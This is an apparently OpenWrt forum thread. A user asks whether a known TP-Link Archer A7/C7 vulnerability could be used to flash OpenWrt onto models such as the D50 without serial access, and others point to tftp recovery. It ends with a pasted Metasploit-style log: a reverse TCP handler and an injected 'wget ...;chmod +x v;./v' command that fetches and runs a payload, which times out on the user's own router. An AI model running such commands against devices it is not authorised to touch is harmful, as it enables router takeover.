my question is: through this vulnerability, is it possible to install openwrt in devices not compatible with standard installation ?? i am not quite prepared to create the whole command byte by byte and subsequently automate installation, but i believe it is possible in all tp-link devices controllable with "tp-link tether" app
this link with procedure "https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo"
According to https://git.openwrt.org/?p=openwrt/openwrt.git;a=commitdiff;h=1e4ee63cc8d1889a78b539a5ed7be8d56e9b976f, the archer a7 can be flashed via tftp.
yes I know that c7 is compatible without uart, c7 was used as an example to exploit the vulnerability in the function, tp-link-soho-router << >> tp-link-tether-app; I was referring to other models on which openwrt can only be installed with uart, exploiting this vulnerability it is possible to install openwrt without uart
Errm, the archer a7 has a working push-button tftp recovery option, which can be used to install OpenWrt. All you need is a tftp server on your computer and a paper clip, you neither need to open the case nor use serial access - why on earth would you go a more complicated way to find an exploit, if the front door is wide open.
1 Like
I would like to install openwrt on a D50, no one was able to flash without uart, also any other tp-links that do not support standard installation
I tried to rename the topic, because it's misleading, but it doesn't let me edit
Then why are you asking about the archer a7, if you actually want to know about the D50…
Yes, security issues might be possible to exploit for gaining root access - that doesn't mean there's be a three-step-guide to profit.
the d50 times out, maybe it's not vulnerable, anyway I think it works on many tp-links, not just a7
[*] Started reverse TCP handler on 172.16.16.68:4444
[*] Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726) (MY D50 TPLINK)
[*] Starting up our web service on http://172.16.16.68:8080 ...
[*] Using URL: http://172.16.16.68:8080/v
[*] 172.16.16.100:20002 - Connecting to the target
[*] 172.16.16.100:20002 - Sending command file byte by byte
[*] 172.16.16.100:20002 - Command: wget http://172.16.16.68:8080/v;chmod +x v;./v
[*] 172.16.16.100:20002 - [0%]= = => - - - - - - - - - - - - - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = => - - - - - - - - - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = = = = = => - - - - - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = = = = = = = = = => - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = = = = = = = = = = = = = =>[100%]
[*] 172.16.16.100:20002 - Command file sent, attempting to execute...
[-] Exploit aborted due to failure: unknown: 172.16.16.100:20002 - Timeout reached! Payload was not downloaded :(
[*] Server stopped.
[*] Exploit completed, but no session was created.